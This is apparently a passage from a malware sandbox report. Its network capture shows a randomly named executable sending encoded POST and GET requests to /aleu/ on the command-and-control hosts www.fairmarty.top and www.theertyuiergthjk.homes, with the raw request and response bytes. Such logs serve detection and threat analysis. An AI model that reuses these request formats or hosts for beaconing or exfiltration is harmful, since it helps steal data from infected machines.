                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                          Data Raw: 4d 7a 59 44 6b 6c 66 3d 34 47 62 4d 54 67 72 30 6a 39 6c 53 5a 67 35 39 42 69 4e 48 69 71 36 55 2f 45 37 41 76 67 33 6e 43 58 69 48 48 35 53 54 79 70 73 6c 31 64 49 38 54 4e 34 4b 75 69 67 63 56 37 44 35 42 6e 59 4b 58 67 48 39 54 31 37 71 54 58 4d 52 46 65 78 2b 64 66 43 62 4c 50 5a 42 62 70 4d 7a 61 61 42 4e 71 4f 64 75 38 6f 53 42 64 6a 4b 63 62 39 52 61 74 51 4d 50 53 41 68 78 78 62 48 67 79 36 44 70 6f 4b 56 6a 74 7a 51 46 56 50 31 69 72 4d 31 61 33 72 6d 77 44 47 4c 65 54 62 30 4b 6e 51 57 34 48 2f 58 6c 58 57 30 50 76 78 55 62 73 48 79 64 56 53 4c 68 34 64 4a 36 2f 32 2f 52 6c 42 6e 7a 70 51 38 41 4d 54 6f 31 33 39 4d 70 32 54 30 56 35 5a 6d 39 54 69 34 4e 6f 71 75 66 78 61 4a 7a 7a 73 69 57 6e 30 41 3d
                                                                                                                                                                          Data Ascii: MzYDklf=4GbMTgr0j9lSZg59BiNHiq6U/E7Avg3nCXiHH5STypsl1dI8TN4KuigcV7D5BnYKXgH9T17qTXMRFex+dfCbLPZBbpMzaaBNqOdu8oSBdjKcb9RatQMPSAhxxbHgy6DpoKVjtzQFVP1irM1a3rmwDGLeTb0KnQW4H/XlXW0PvxUbsHydVSLh4dJ6/2/RlBnzpQ8AMTo139Mp2T0V5Zm9Ti4NoqufxaJzzsiWn0A=
                                                                                                                                                                          Apr 26, 2024 07:43:12.165729046 CEST533INHTTP/1.1 404 Not Found
                                                                                                                                                                          Date: Fri, 26 Apr 2024 05:43:12 GMT
                                                                                                                                                                          Server: Apache
                                                                                                                                                                          Content-Length: 389
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          19192.168.2.749745203.161.46.103802912C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Apr 26, 2024 07:43:15.812611103 CEST1786OUTPOST /aleu/ HTTP/1.1
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Host: www.fairmarty.top
                                                                                                                                                                          Origin: http://www.fairmarty.top
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Content-Length: 1252
                                                                                                                                                                          Cache-Control: max-age=0
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Referer: http://www.fairmarty.top/aleu/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                          Data Raw: 4d 7a 59 44 6b 6c 66 3d 34 47 62 4d 54 67 72 30 6a 39 6c 53 5a 67 35 39 42 69 4e 48 69 71 36 55 2f 45 37 41 76 67 33 6e 43 58 69 48 48 35 53 54 79 70 6b 6c 31 76 41 38 54 75 41 4b 76 69 67 63 57 37 44 36 42 6e 5a 57 58 6d 76 35 54 31 33 63 54 56 45 52 45 38 35 2b 62 74 6d 62 41 50 5a 42 55 4a 4d 32 48 71 42 59 71 4f 4e 71 38 6f 69 42 64 6a 4b 63 62 2f 5a 61 72 43 6b 50 51 41 67 44 6d 72 48 61 34 61 44 42 6f 4c 38 65 74 7a 63 7a 55 2f 56 69 72 73 46 61 31 64 4b 77 41 6d 4c 63 57 62 31 56 6e 51 71 64 48 2f 4c 44 58 58 42 55 76 32 34 62 70 43 54 63 42 43 48 61 75 72 64 73 35 30 37 47 7a 78 4c 70 77 6d 38 66 45 67 63 36 37 36 49 38 33 43 67 44 78 4e 37 67 48 45 59 4d 67 72 4b 6f 2b 63 77 4e 75 4d 48 55 6b 51 69 6c 6e 45 48 50 6f 36 38 6d 74 6b 50 39 62 68 2b 48 65 55 47 66 37 7a 2f 6b 44 56 50 49 36 61 51 2b 67 39 71 42 6f 7a 77 78 63 2f 53 45 45 52 35 57 70 52 44 37 58 48 48 66 50 42 43 43 44 67 6c 67 4b 5a 49 53 6b 43 38 72 4f 72 4d 33 34 76 63 6e 57 4e 36 30 62 50 62 48 4e 76 62 70 4e 2b 7a 59 66 58 58 76 33 39 57 30 48 75 4b 78 64 65 67 37 35 70 61 6b 33 68 4b 4a 46 64 36 57 33 4e 4c 4b 54 65 70 6a 37 35 4d 7a 6f 35 51 49 38 36 47 33 65 74 6b 54 79 5a 51 4a 67 36 47 6c 6a 4e 4d 70 6a 4e 43 58 31 37 31 42 74 47 50 58 36 68 36 56 33 37 4c 36 32 64 51 62 2f 74 54 47 63 2b 59 44 38 78 31 2f 47 44 49 73 4b 72 4e 74 4b 33 6c 4e 72 63 78 66 43 73 4b 58 77 7a 37 57 37 44 63 74 6c 34 64 6c 5a 6a 61 41 47 4e 79 46 34 72 38 57 75 6b 4c 50 54 38 31 58 75 45 46 78 4d 69 33 64 70 35 30 5a 4a 67 6a 43 4d 47 67 61 4f 2b 65 36 77 43 56 6b 2f 2b 4a 6e 41 31 6a 56 32 69 77 4d 2f 6e 35 58 74 56 36 53 39 62 52 77 76 32 6d 62 7a 56 6f 37 52 72 70 77 4c 32 71 33 68 52 4a 43 74 69 53 4f 39 76 56 58 30 4c 4b 61 6a 55 4e 49 42 4a 56 39 44 75 34 43 6c 34 44 7a 6c 72 58 65 49 4b 6b 47 68 78 63 77 6a 37 30 4a 31 4b 6d 51 67 46 59 30 58 61 37 59 67 59 2b 61 6c 35 4a 68 66 73 58 51 31 39 49 55 35 76 61 76 65 58 67 61 62 51 71 57 39 39 68 73 47 45 4d 41 59 45 58 50 51 7a 6f 61 42 4c 72 32 4f 48 71 54 35 70 37 76 67 61 4c 68 6f 7a 76 35 72 47 74 51 64 4f 66 63 6d 73 63 42 36 41 2f 71 76 49 6d 59 6d 44 63 71 6d 78 43 67 4d 46 52 32 6f 75 6c 37 38 43 62 36 74 66 79 4b 6d 69 76 76 48 30 70 46 35 6f 79 68 51 6a 55 7a 75 4a 4a 62 49 37 4c 71 42 71 41 35 58 76 44 55 78 32 6a 4c 49 2f 65 68 78 72 6d 52 2b 5a 64 59 37 78 2b 68 76 68 52 51 73 42 54 63 39 33 45 2f 4f 57 57 35 2f 4d 37 68 49 76 4b 4d 64 33 33 52 66 71 57 49 69 4a 42 4c 7a 46 37 4f 57 74 67 4e 59 6f 6a 4b 55 6b 58 59 63 32 75 41 6e 4d 4a 79 5a 75 65 77 53 71 30 42 7a 67 74 72 78 48 48 30 71 61 44 4b 70 4c 38 50 4d 6d 63 66 65 6d 2f 4a 47 50 7a 42 58 30 51 74 37 42 2b 72 36 66 6d 65 4e 53 32 4e 79 63 63 67 4a 72 62 54 53 4c 66 2f 65 4a 6b 38 35 73 43 67 6f 5a 78 2b 70 49 57 76 53 4c 76 57 63 47 34 41 31 78 50 64 47 58 5a 6d 70 66 32 58 6e 68 53 4c 47 78 4c 4e 38 7a 47 75 71 50 36 52 4e 7a 46 58 7a 45 53 76 70 72 36 76 50 6f 4f 64 73 6f 6c 4c 32 42 6c 4d 44 68 6e 75 61 68 47 4b 4c 57 56 2b 53 44 79 57 4f 64 66 72 4a 51 68 74 67 77 37 69 6e 35 6b 4c 4d 4c 2b 76 51 35 65 45 34 4c 34 78 66 49 31 4b 59 64 54 70 6d 7a 51 5a 30 74 67 4a 7a 76 38 34 30 64 59 5a 53 63 2f 66 6e 71 37 2b 2f 6b 2b 30 56 32 63 66 57 30 70 79 4d 4b 63 73 65 4b 73 79 30 32 79 6b 55 4b 71 53 6e 64 34 70 36 75 76 47 6d 50 57 64 4c 56 2b 59 6e 43 4b 43 30 42 56 61 4c 59 4c 66 37 62 2f 6c 66 65 62 48 78 6c 6f 66 37 74 50 6f 6f 4c 37 43 68 54 61 44 70 54 78 47 43 2f 32 4e 35 5a 57 52 58 51 46 31 78 39 53 30 73 48 31 71 49 68 47 69 71 68 4b 75 56 4d 66 34 64 6b 37 6d 57 36 49 6b 59 65 69 43 4f 71 6e 45 34 70 72 58 56 39 65 6b 55 78 42 42 4c 59 6d 43 52 4f 61 6e 68 6a 70 65 6d 72 50 76 46 41 43 52 41 45 59 76 78 63 6c 37 73 68 77 7a 48 4c 4d 5a 68 75 76 57 4f 71 54 72 35 31 4b 33 4a 35 63 64 47 4c 69 43
                                                                                                                                                                          Data Ascii: MzYDklf=4GbMTgr0j9lSZg59BiNHiq6U/E7Avg3nCXiHH5STypkl1vA8TuAKvigcW7D6BnZWXmv5T13cTVERE85+btmbAPZBUJM2HqBYqONq8oiBdjKcb/ZarCkPQAgDmrHa4aDBoL8etzczU/VirsFa1dKwAmLcWb1VnQqdH/LDXXBUv24bpCTcBCHaurds507GzxLpwm8fEgc676I83CgDxN7gHEYMgrKo+cwNuMHUkQilnEHPo68mtkP9bh+HeUGf7z/kDVPI6aQ+g9qBozwxc/SEER5WpRD7XHHfPBCCDglgKZISkC8rOrM34vcnWN60bPbHNvbpN+zYfXXv39W0HuKxdeg75pak3hKJFd6W3NLKTepj75Mzo5QI86G3etkTyZQJg6GljNMpjNCX171BtGPX6h6V37L62dQb/tTGc+YD8x1/GDIsKrNtK3lNrcxfCsKXwz7W7Dctl4dlZjaAGNyF4r8WukLPT81XuEFxMi3dp50ZJgjCMGgaO+e6wCVk/+JnA1jV2iwM/n5XtV6S9bRwv2mbzVo7RrpwL2q3hRJCtiSO9vVX0LKajUNIBJV9Du4Cl4DzlrXeIKkGhxcwj70J1KmQgFY0Xa7YgY+al5JhfsXQ19IU5vaveXgabQqW99hsGEMAYEXPQzoaBLr2OHqT5p7vgaLhozv5rGtQdOfcmscB6A/qvImYmDcqmxCgMFR2oul78Cb6tfyKmivvH0pF5oyhQjUzuJJbI7LqBqA5XvDUx2jLI/ehxrmR+ZdY7x+hvhRQsBTc93E/OWW5/M7hIvKMd33RfqWIiJBLzF7OWtgNYojKUkXYc2uAnMJyZuewSq0BzgtrxHH0qaDKpL8PMmcfem/JGPzBX0Qt7B+r6fmeNS2NyccgJrbTSLf/eJk85sCgoZx+pIWvSLvWcG4A1xPdGXZmpf2XnhSLGxLN8zGuqP6RNzFXzESvpr6vPoOdsolL2BlMDhnuahGKLWV+SDyWOdfrJQhtgw7in5kLML+vQ5eE4L4xfI1KYdTpmzQZ0tgJzv840dYZSc/fnq7+/k+0V2cfW0pyMKcseKsy02ykUKqSnd4p6uvGmPWdLV+YnCKC0BVaLYLf7b/lfebHxlof7tPooL7ChTaDpTxGC/2N5ZWRXQF1x9S0sH1qIhGiqhKuVMf4dk7mW6IkYeiCOqnE4prXV9ekUxBBLYmCROanhjpemrPvFACRAEYvxcl7shwzHLMZhuvWOqTr51K3J5cdGLiC
                                                                                                                                                                          Apr 26, 2024 07:43:16.013987064 CEST533INHTTP/1.1 404 Not Found
                                                                                                                                                                          Date: Fri, 26 Apr 2024 05:43:15 GMT
                                                                                                                                                                          Server: Apache
                                                                                                                                                                          Content-Length: 389
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          20192.168.2.749746203.161.46.103802912C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Apr 26, 2024 07:43:18.530144930 CEST500OUTGET /aleu/?MzYDklf=1EzsQVnX0vVrGxBYNXB1u7fNxljhjRHJWEXTYZCw6Y45y9QSTO9z6ggEQaWzMFMNeg7sTl3Zf11WKrZHAcHpX9hrZ8kVd6B8qbB5+OCtdAqRU7IipAokYiIG2rDB/a+dgcBIv0Zff4BY&PHaLL=ePmHKpKXdtoDqXh HTTP/1.1
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          Host: www.fairmarty.top
                                                                                                                                                                          Connection: close
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                          Apr 26, 2024 07:43:18.729918957 CEST548INHTTP/1.1 404 Not Found
                                                                                                                                                                          Date: Fri, 26 Apr 2024 05:43:18 GMT
                                                                                                                                                                          Server: Apache
                                                                                                                                                                          Content-Length: 389
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          21192.168.2.749747205.234.233.38802912C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Apr 26, 2024 07:43:24.153331041 CEST780OUTPOST /aleu/ HTTP/1.1
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Host: www.theertyuiergthjk.homes
                                                                                                                                                                          Origin: http://www.theertyuiergthjk.homes
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Content-Length: 220
                                                                                                                                                                          Cache-Control: max-age=0
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Referer: http://www.theertyuiergthjk.homes/aleu/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                          Data Raw: 4d 7a 59 44 6b 6c 66 3d 48 49 6c 2b 35 65 6c 33 49 38 35 53 57 73 75 32 50 37 78 6b 4b 43 48 37 50 5a 4f 74 69 71 2b 45 55 2f 6b 71 6f 64 31 65 67 31 32 76 34 58 53 35 63 6d 66 48 4d 54 39 47 4e 55 30 77 75 4d 57 52 36 33 6d 62 71 49 4d 42 74 56 51 35 79 49 7a 36 38 5a 41 73 39 79 68 79 32 6c 49 65 61 68 72 65 52 2f 6f 33 31 71 30 65 4d 62 6a 70 6d 42 33 49 6f 72 4c 36 43 33 51 79 52 35 47 69 4f 48 4a 4b 4e 31 47 4d 42 6f 2b 79 37 52 51 54 71 47 74 75 6c 76 2b 61 42 42 71 71 77 41 72 71 6c 64 2f 6c 53 47 56 74 58 42 38 71 52 55 44 62 31 64 30 42 57 6a 79 41 30 47 66 69 37 30 6a 54 4a 72 63 61 6e 74 34 48 66 58 62 48 4f 51 54 32 63 6b 6d 30 34 77 3d 3d
                                                                                                                                                                          Data Ascii: MzYDklf=HIl+5el3I85SWsu2P7xkKCH7PZOtiq+EU/kqod1eg12v4XS5cmfHMT9GNU0wuMWR63mbqIMBtVQ5yIz68ZAs9yhy2lIeahreR/o31q0eMbjpmB3IorL6C3QyR5GiOHJKN1GMBo+y7RQTqGtulv+aBBqqwArqld/lSGVtXB8qRUDb1d0BWjyA0Gfi70jTJrcant4HfXbHOQT2ckm04w==
                                                                                                                                                                          Apr 26, 2024 07:43:24.710182905 CEST697INHTTP/1.1 405 Not Allowed
                                                                                                                                                                          Server: nginx
                                                                                                                                                                          Date: Fri, 26 Apr 2024 05:43:24 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Content-Length: 552
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                                          Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          22192.168.2.749748205.234.233.38802912C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Apr 26, 2024 07:43:26.871974945 CEST800OUTPOST /aleu/ HTTP/1.1
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Host: www.theertyuiergthjk.homes
                                                                                                                                                                          Origin: http://www.theertyuiergthjk.homes
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Content-Length: 240
                                                                                                                                                                          Cache-Control: max-age=0
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Referer: http://www.theertyuiergthjk.homes/aleu/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                          Data Raw: 4d 7a 59 44 6b 6c 66 3d 48 49 6c 2b 35 65 6c 33 49 38 35 53 58 4d 2b 32 4d 63 46 6b 4d 69 48 36 53 70 4f 74 72 4b 2f 4e 55 2f 59 71 6f 63 78 6f 31 58 43 76 34 32 4f 35 64 6a 7a 48 50 54 39 47 56 45 31 30 67 73 57 4b 36 33 71 69 71 4a 41 42 74 55 30 35 79 4a 44 36 38 71 59 76 38 69 68 77 37 46 4a 59 55 42 72 65 52 2f 6f 33 31 71 67 34 4d 66 48 70 6d 52 48 49 76 35 7a 35 65 48 51 78 51 35 47 69 5a 33 4a 4f 4e 31 47 55 42 70 6a 64 37 54 34 54 71 48 64 75 6c 2b 2b 5a 49 42 72 68 2b 67 72 34 32 66 6d 4a 54 6c 34 53 59 68 73 69 51 31 4c 4b 35 4c 70 6a 4d 42 2b 73 71 58 6e 5a 2f 32 48 6c 65 4e 42 76 6c 73 38 66 53 31 76 6d 52 6e 32 63 52 32 48 77 75 45 46 38 57 55 45 6f 57 47 2b 64 68 7a 53 4f 5a 2f 67 68 43 54 34 3d
                                                                                                                                                                          Data Ascii: MzYDklf=HIl+5el3I85SXM+2McFkMiH6SpOtrK/NU/Yqocxo1XCv42O5djzHPT9GVE10gsWK63qiqJABtU05yJD68qYv8ihw7FJYUBreR/o31qg4MfHpmRHIv5z5eHQxQ5GiZ3JON1GUBpjd7T4TqHdul++ZIBrh+gr42fmJTl4SYhsiQ1LK5LpjMB+sqXnZ/2HleNBvls8fS1vmRn2cR2HwuEF8WUEoWG+dhzSOZ/ghCT4=
                                                                                                                                                                          Apr 26, 2024 07:43:27.411938906 CEST697INHTTP/1.1 405 Not Allowed
                                                                                                                                                                          Server: nginx
                                                                                                                                                                          Date: Fri, 26 Apr 2024 05:43:27 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Content-Length: 552
                                                                                                                                                                          Connection: close
